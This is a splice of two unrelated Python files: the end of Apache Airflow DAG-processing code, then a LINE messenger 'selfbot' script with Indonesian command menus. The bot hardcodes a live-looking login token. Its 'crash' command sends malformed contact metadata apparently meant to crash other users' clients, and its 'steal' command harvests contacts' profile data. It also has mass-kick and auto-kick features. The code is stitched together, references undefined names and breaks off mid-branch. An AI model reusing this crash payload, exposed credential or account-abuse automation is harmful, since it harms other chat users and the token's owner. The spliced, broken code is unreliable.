Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics summarizing dag parsing.
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
@property
def file_paths(self):
return self._file_paths
|
ponselfbot.py
|
# -*- coding: utf-8 -*-
#Cakmin_BOTeam Newbie
#Owner:https://line.me/ti/p/~agsantr
#Official Account:http://line.me/ti/p/%40fvz4767v
#Instagram:cakminofficial
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia, goslate
import timeit
from bs4 import BeautifulSoup
from urllib import urlopen
from io import StringIO
from threading import Thread
from gtts import gTTS
from googletrans import Translator
import six
if (six.PY2):
import urllib2
import urllib
else:
import urllib.request
import urllib.parse
cl = LINETCR.LINE()
cl.login(token="EtFJMNmRdY7JT7J03om3.9r0C5FyHndoySvmBoI+OWW.QwDHni6kLrKf7APItHg7KZHXPrF773aCe+j8DxBv/eA=")
cl.loginResult()
print "==================[Login Success]==================="
reload(sys)
sys.setdefaultencoding('utf-8')
helpmsg ="""
╔════[BenhponzCKZ]
╠➩ Help1
╠➩ Help2
╠➩ Help3
╠➩ Help4
╠➩ Help5
╚════[BenhponzCKZ]
"""
helppro ="""
╔════[ Protect Command ]
╠➩ Protect on/off
╠➩ Qr on/off
╠➩ Invit on/off
╠➩ Cancel on/off
╚════[ Protect Command ]
"""
helpself ="""
╔════[ Self Command ]
╠➩ Me〙
╠➩ Myname:
╠➩ Mybio:
╠➩ Myname
╠➩ Mybio
╠➩ Mypict
╠➩ Mycover
╠➩ Mycopy @
╠➩ Mybackup
╠➩ Getgrup image
╠➩ Getmid @
╠➩ Getprofile @
╠➩ Getcontact @
╠➩ Getinfo @
╠➩ Getname @
╠➩ Getbio @
╠➩ Getpict @
╠➩ Getcover @
╠➩ Mention
╠➩ Sider on/off
╠➩ Sider
╠➩ Mimic on/off
╠➩ Micadd @
╠➩ Micdel @
╚════[ Self Command ]
"""
helpset ="""
╔════[ Setting Command ]
╠➩ Contact on/off
╠➩ Autojoin on/off
╠➩ Autoleave on/off
╠➩ Autoadd on/off
╠➩ Like me
╠➩ Like friend
╠➩ Like on
╠➩ My respon on/off
╠➩ My read on/off
╠➩ My simisimi on/off
╚════[ Setting Command ]
"""
helpgrup ="""
╔════[ Group Command ]
╠➩ Link on/off
╠➩ Url
╠➩ Gcreator
╠➩ Kick @
╠➩ Ulti @
╠➩ Cancel
╠➩ Gname:
╠➩ Infogrup
╠➩ Gruplist
╠➩ Friendlist
╠➩ Blocklist
╠➩ Ban @
╠➩ Unban @
╠➩ Clearban
╠➩ Banlist
╠➩ Contactban
╠➩ Midban
╚════[ Group Command ]
"""
helpmed ="""
╔════[ Social Media Command ]
╠➩ kalender
╠➩ tr-id
╠➩ tr-en
╠➩ tr-jp
╠➩ tr-ko
╠➩ say-id
╠➩ say-en
╠➩ say-jp
╠➩ say-ko
╠➩ /cekig
╠➩ /postig
╠➩ checkdate
╠➩ wikipedia
╠➩ lirik
╠➩ video
╠➩ /image
╠➩ /youtube
╚════[ Social Media Command ]
"""
mid = cl.getProfile().mid
Bots=["uf51d1ce5f621343398b1531b3a2fe8c3"]
wait = {
"likeOn":True,
"alwayRead":False,
"detectMention":True,
"kickMention":False,
"steal":False,
'pap':{},
'invite':{},
"spam":{},
'contact':False,
'autoJoin':True,
'autoCancel':{"on":False,"members":50},
'leaveRoom':False,
'timeline':True,
'autoAdd':False,
'message':"Thanks for add by",
"lang":"JP",
"comment":"Haii Kaka",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cNames":" ",
"cNames":"",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
}
wait2 = {
"readPoint":{},
"readMember":{},
"setTime":{},
"ROM":{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version:
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers = headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else:
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1:
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+1)
end_content = s.find(',"ow"',start_content+1)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item)
time.sleep(0.1)
page = page[end_content:]
return items
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
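# For reference, the MENTION contentMetadata built above serializes to JSON of
# the form (the S/E offsets index into msg.text, M is the mentioned user's mid):
#   {"MENTIONEES": [{"S": "14", "E": "16", "M": "u0123..."}, ...]}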
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
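# Example: waktu(3725) returns '01 Jam 02 Menit 05 Detik'
# (Indonesian for "01 hours 02 minutes 05 seconds").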
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def sendAudio(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M.contentMetadata = None
M.contentPreview = None
M2 = self.Talk.client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload audio failure.')
return True
def sendAudioWithUrl(self, to_, url):
path = '%s/pythonLine-%1.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
raise (e)
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
cl.sendText(msg.to, "[ChatBOT] " + data['result']['response'].encode('utf-8'))
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Penting? pc kak"]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_ + cName)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["kickMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Ngetag = auto kick!!"]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait['invite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Invite " + _name)
wait['invite'] = False
break
except:
cl.sendText(msg.to,"Error")
wait['invite'] = False
break
if msg.contentType == 13:
if wait["steal"] == True:
_name = msg.contentMetadata["displayName"]
copy = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
print "[Target] Stealed"
break
else:
targets.append(copy)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
wait["steal"] = False
break
except:
pass
if wait["alwayRead"] == True:
if msg.toType == 0:
cl.sendChatChecked(msg.from_,msg.id)
else:
cl.sendChatChecked(msg.to,msg.id)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"In Blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Nothing")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Not in Blacklist")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"In Blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'selfhelp':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpmsg)
else:
cl.sendText(msg.to,helpmsg)
elif msg.text.lower() == 'help5':
if wait["lang"] == "JP":
cl.sendText(msg.to,helppro)
else:
cl.sendText(msg.to,helppro)
elif msg.text.lower() == 'help4':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpself)
else:
cl.sendText(msg.to,helpself)
elif msg.text.lower() == 'help3':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpgrup)
else:
cl.sendText(msg.to,helpgrup)
elif msg.text.lower() == 'help2':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpset)
else:
cl.sendText(msg.to,helpset)
elif msg.text.lower() == 'help1':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpmed)
else:
cl.sendText(msg.to,helpmed)
elif msg.text.lower() == 'speed':
cl.sendText(msg.to, "Mencurigai..")
start = time.time()
time.sleep(0.07)
elapsed_time = time.time() - start
cl.sendText(msg.to, "Tercyduck\n Speed : %sseconds" % (elapsed_time))
elif msg.text.lower() == 'sp':
cl.sendText(msg.to, "Mencurigai..")
start = time.time()
time.sleep(0.07)
elapsed_time = time.time() - start
cl.sendText(msg.to, "Tercyduck\n Speed : %sseconds" % (elapsed_time))
elif msg.text.lower() == 'crash':
msg.contentType = 13
msg.contentMetadata = {'mid': "ud7a8fbcc2af037c2c5bf181b89fda5f7',"}
cl.sendMessage(msg)
elif msg.text.lower() == 'me':
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
#========================== B O T  C O M M A N D =============================#
#==============================================================================#
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"contact set to on")
else:
cl.sendText(msg.to,"contact already on")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"contact set to on")
else:
cl.sendText(msg.to,"contact already on")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"contact set to off")
else:
cl.sendText(msg.to,"contact already off")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"contact set to off")
else:
cl.sendText(msg.to,"contact already off")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection set to on")
else:
cl.sendText(msg.to,"Protection already on")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection set to on")
else:
cl.sendText(msg.to,"Protection already on")
elif msg.text.lower() == 'qr on':
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr set to on")
else:
cl.sendText(msg.to,"Protection Qr already on")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr set to on")
else:
cl.sendText(msg.to,"Protection Qr already on")
elif msg.text.lower() == 'invit on':
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite set to on")
else:
cl.sendText(msg.to,"Protection Invite already on")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite set to on")
else:
cl.sendText(msg.to,"Protection Invite already on")
elif msg.text.lower() == 'cancel on':
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection set to on")
else:
cl.sendText(msg.to,"Cancel Protection already on")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection set to on")
else:
cl.sendText(msg.to,"Cancel Protection already on")
elif msg.text.lower() == 'autojoin on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Autojoin set to on")
else:
cl.sendText(msg.to,"Autojoin already on")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Autojoin set to on")
else:
cl.sendText(msg.to,"Autojoin already on")
elif msg.text.lower() == 'autojoin off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Autojoin set to off")
else:
cl.sendText(msg.to,"Autojoin already off")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Autojoin set to off")
else:
cl.sendText(msg.to,"Autojoin already off")
elif msg.text.lower() == 'protect off':
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection set to off")
else:
cl.sendText(msg.to,"Protection already off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection set to off")
else:
cl.sendText(msg.to,"Protection already off")
elif msg.text.lower() == 'qr off':
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr set to off")
else:
cl.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr set to off")
else:
cl.sendText(msg.to,"Protection Qr already off")
elif msg.text.lower() == 'invit off':
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite set to off")
else:
cl.sendText(msg.to,"Protection Invite already off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite set to off")
else:
cl.sendText(msg.to,"Protection Invite already off")
elif msg.text.lower() == 'cancel off':
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Invite set to off")
else:
cl.sendText(msg.to,"Cancel Protection Invite already off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Invite set to off")
else:
cl.sendText(msg.to,"Cancel Protection Invite already off")
elif "Grup cancel:" in msg.text:
try:
strnum = msg.text.replace("Grup cancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Itu off undangan ditolak??\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan")
else:
cl.sendText(msg.to,"Off undangan ditolak??Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis")
else:
cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nilai tidak benar")
else:
cl.sendText(msg.to,"Weird value")
elif msg.text.lower() == 'autoleave on':
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to on")
else:
cl.sendText(msg.to,"Auto Leave room already on")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to on")
else:
cl.sendText(msg.to,"Auto Leave room already on")
elif msg.text.lower() == 'autoleave off':
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to off")
else:
cl.sendText(msg.to,"Auto Leave room already off")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to off")
else:
cl.sendText(msg.to,"Auto Leave room already off")
elif msg.text.lower() == 'share on':
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to on")
else:
cl.sendText(msg.to,"Share already on")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to on")
else:
cl.sendText(msg.to,"Share already on")
elif msg.text.lower() == 'share off':
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to off")
else:
cl.sendText(msg.to,"Share already off")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to off")
else:
cl.sendText(msg.to,"Share already off")
elif msg.text.lower() == 'status selfbot':
md = ""
if wait["contact"] == True: md+=" Contact:on \n"
else: md+=" Contact:off\n"
if wait["autoJoin"] == True: md+=" Auto Join:on \n"
else: md +=" Auto Join:off\n"
if wait["autoCancel"]["on"] == True:md+=" Auto cancel:" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel:off \n"
if wait["leaveRoom"] == True: md+=" Auto leave:on \n"
else: md+=" Auto leave:off \n"
if wait["timeline"] == True: md+=" Share:on \n"
else:md+=" Share:off \n"
if wait["autoAdd"] == True: md+=" Auto add:on \n"
else:md+=" Auto add:off \n"
if wait["protect"] == True: md+=" Protect:on \n"
else:md+=" Protect:off \n"
if wait["linkprotect"] == True: md+="Link Protect:on \n"
else:md+="Link Protect:off \n"
if wait["inviteprotect"] == True: md+="Invitation Protect:on \n"
else:md+="Invitation Protect:off \n"
if wait["cancelprotect"] == True: md+="Cancel Protect:on \n"
else:md+="Cancel Protect:off \n"
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif cms(msg.text,["creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "u1e1625895e29236e4e2e2cc5e0fb5a85"}
cl.sendMessage(msg)
elif msg.text.lower() == 'autoadd on':
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to on")
else:
cl.sendText(msg.to,"Auto add already on")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to on")
else:
cl.sendText(msg.to,"Auto add already on")
elif msg.text.lower() == 'autoadd off':
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to off")
else:
cl.sendText(msg.to,"Auto add already off")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to off")
else:
cl.sendText(msg.to,"Auto add already off")
elif "Pesan set:" in msg.text:
wait["message"] = msg.text.replace("Pesan set:","")
cl.sendText(msg.to,"We changed the message")
elif msg.text.lower() == 'pesan cek':
if wait["lang"] == "JP":
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif "Come Set:" in msg.text:
c = msg.text.replace("Come Set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di")
else:
cl.sendText(msg.to,"To open")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Comment Actived")
else:
cl.sendText(msg.to,"Comment Has Been Active")
elif msg.text in ["Come off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off")
else:
cl.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off")
else:
cl.sendText(msg.to,"To turn off")
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklist")
else:
cl.sendText(msg.to,"The following is a blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
cl.sendText(msg.to,"Jam already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Jam set on")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
cl.sendText(msg.to,"Jam already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"Jam set off")
elif "Jam say:" in msg.text:
n = msg.text.replace("Jam say:","")
